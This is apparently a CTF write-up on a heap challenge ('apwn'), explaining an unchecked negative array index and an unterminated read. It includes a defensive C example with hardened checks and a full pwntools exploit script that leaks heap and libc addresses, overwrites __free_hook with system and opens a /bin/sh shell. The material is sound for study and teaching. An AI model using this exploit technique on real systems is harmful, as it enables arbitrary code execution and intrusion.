Heap: negative integer index overflow
Full protection (all mitigations enabled)
if ( two[v1] )   // negative values not considered
if ( one[v1] )   // likewise, negative values not considered
Both checks only test whether the slot pointer is valid; neither checks whether the int index v1 is negative. This causes an integer (negative-index) overflow.
In addition, the input taken by read is not \x00-terminated, which creates the conditions for a leak.
1. Use the unterminated read to leak the libc and heap addresses.
2. Change free_hook to system('/bin/sh').
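To make the two root causes concrete from the defender's side, here is an added C example (not code from the challenge or the write-up) that models the slot table as a small pointer array, shows the unchecked index test quoted above beside a hardened version, and wraps read(2) so that a full-length name is always NUL-terminated. The array name two and the 0x18/0x20 name lengths come from the write-up; the table size, the function names and the piped sample input are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed model of the challenge's slot table (name "two" taken from the
 * write-up; the size is an assumption). Each slot holds a pointer to a name. */
#define SLOTS 16
static char *two[SLOTS];

/* Vulnerable check as quoted in the write-up: only the slot content is tested,
 * the sign of v1 is not. With a negative v1 this reads memory *before* the
 * array, so it must never be reached with untrusted v1 (undefined behaviour). */
static char *lookup_vuln(int v1)
{
    if (two[v1])
        return two[v1];
    return NULL;
}

/* Hardened check: reject negative and too-large indices before touching the
 * table. Comparing against the table size closes the whole out-of-bounds
 * class, not just negative values. */
static char *lookup_safe(int v1)
{
    if (v1 < 0 || v1 >= SLOTS)
        return NULL;
    return two[v1];   /* NULL for an empty slot, like the original */
}

/* read(2) stores exactly what arrives and never writes a NUL. If a name fills
 * its buffer, printing it with %s continues into the neighbouring bytes, which
 * is what turns a name into an address leak. Reserve one byte and terminate. */
static ssize_t read_name(int fd, char *buf, size_t cap)
{
    if (cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) {
        buf[0] = '\0';
        return n;
    }
    buf[n] = '\0';
    return n;
}

/* Self-contained demo: push 0x20 bytes of 'b' through a pipe (constructed
 * input, the length of the write-up's luckydog name) into a 0x18-byte name
 * slot. Returns the printable length of the stored name. */
static size_t demo_truncated_name(void)
{
    static char name[0x18 + 1];   /* one spare byte for the terminator */
    char input[0x20];
    int fds[2];
    memset(input, 'b', sizeof input);
    if (pipe(fds) != 0)
        return (size_t)-1;
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input)
        return (size_t)-1;
    close(fds[1]);
    read_name(fds[0], name, sizeof name);
    close(fds[0]);
    return strlen(name);   /* 0x18: bounded by the buffer, not by the input */
}

int main(void)
{
    two[0] = "single dog";
    printf("lookup_vuln(0)   -> %s\n", lookup_vuln(0));
    printf("lookup_safe(0)   -> %s\n", lookup_safe(0));
    printf("lookup_safe(-11) -> %s\n", lookup_safe(-11) ? "ptr" : "rejected");
    printf("stored name length: %zu\n", demo_truncated_name());
    return 0;
}
```

The index -11 used in the hardened lookup call is the one the write-up's script later feeds to the edit routine; with the range check in place it is rejected before any memory access, and with the terminating read the name can no longer run into whatever follows it.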
# Exploit script for ./apwn (pwntools with Python 2 string semantics: p64()
# results and '\x00' literals are passed straight to send()).
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
debug = 1
if debug:
    context.log_level = 'debug'
cn = process('./apwn')
# cn = process('./the_end', env=)
elf = ELF('./apwn')
libc = elf.libc
# libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
# libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')

# I/O helpers
s = lambda data: cn.send(str(data))
sa = lambda delim, data: cn.sendafter(str(delim), str(data))
st = lambda delim, data: cn.sendthen(str(delim), str(data))
sl = lambda data: cn.sendline(str(data))
sla = lambda delim, data: cn.sendlineafter(str(delim), str(data))
r = lambda numb=4096: cn.recv(numb)
rl = lambda: cn.recvline()
ru = lambda delims: cn.recvuntil(delims)
irt = lambda: cn.interactive()
uu32 = lambda data: u32(data.ljust(4, '\0'))
uu64 = lambda data: u64(data.ljust(8, '\0'))

# Menu wrappers: option 1 = single dog, 2 = lucky dog, 3/4 = edit, 5 = delete
def create_luckydog(name, partner):
    ru('>>')
    sl(2)
    s(name)
    ru("your partner's name")
    s(partner)

def create_singledog(name):
    ru('>>')
    sl(1)
    s(name)

def edit_singledog(index, name):
    ru('>>')
    sl(3)
    sl(index)
    # ru('oh,singledog,changing your name can bring you good luck.')
    s(name)

def edit_luckydog(index, name, partner):
    ru('>>')
    sl(4)
    sl(index)
    s(name)
    s(partner)

def dele():
    ru('>>')
    sl(5)

create_singledog('/bin/sh\x00' + '\x00' * 0x18)   # two[0]
create_luckydog('b' * 0x18, 'c' * 0x20)           # one[0]
create_singledog('/bin/sh\x00')                   # two[1]
create_luckydog('e' * 0x18, 'f' * 0x20)           # one[1]

# leak heap
dele()
dele()
create_singledog('\x30')
edit_singledog(0, '\x30')
ru('new name: ')
heap = uu64(r(6)) - 0x30
success('heap= {}'.format(hex(heap)))

# leak program base (unused alternative)
# edit_singledog(-11, '\x08')
# ru('new name: ')
# start = uu64(r(6)) - 0x202008
# success('start= {}'.format(hex(start)))

# leak libc: negative index -11 reaches the stdout pointer
edit_singledog(-11, '\x20')
ru('new name: ')
libc_base = uu64(r(6)) - libc.symbols['_IO_2_1_stdout_']   # 0x3c5620
success('libc_base= {}'.format(hex(libc_base)))

# remote variant of the libc leak
# edit_singledog(-4, '11111111')
# ru('11111111')
# gdb.attach(cn)
# libc_base = uu64(r(6)) - 0x3ec703   # remote
# success('libc_base= {}'.format(hex(libc_base)))

# write free_hook
free_hook = libc_base + libc.symbols['__free_hook']
sys = libc_base + libc.symbols['system']
success('free_hook= {}'.format(hex(free_hook)))
success('system= {}'.format(hex(sys)))
edit_singledog(80, p64(free_hook))
edit_luckydog(0, 'a' * 0x18, p64(sys) + '\x00' * 0x18)
edit_singledog(80, p64(heap + 0x100))
edit_luckydog(0, 'a' * 0x18, '/bin/sh\x00' + '\x00' * 0x18)
# gdb.attach(cn)
dele()
irt()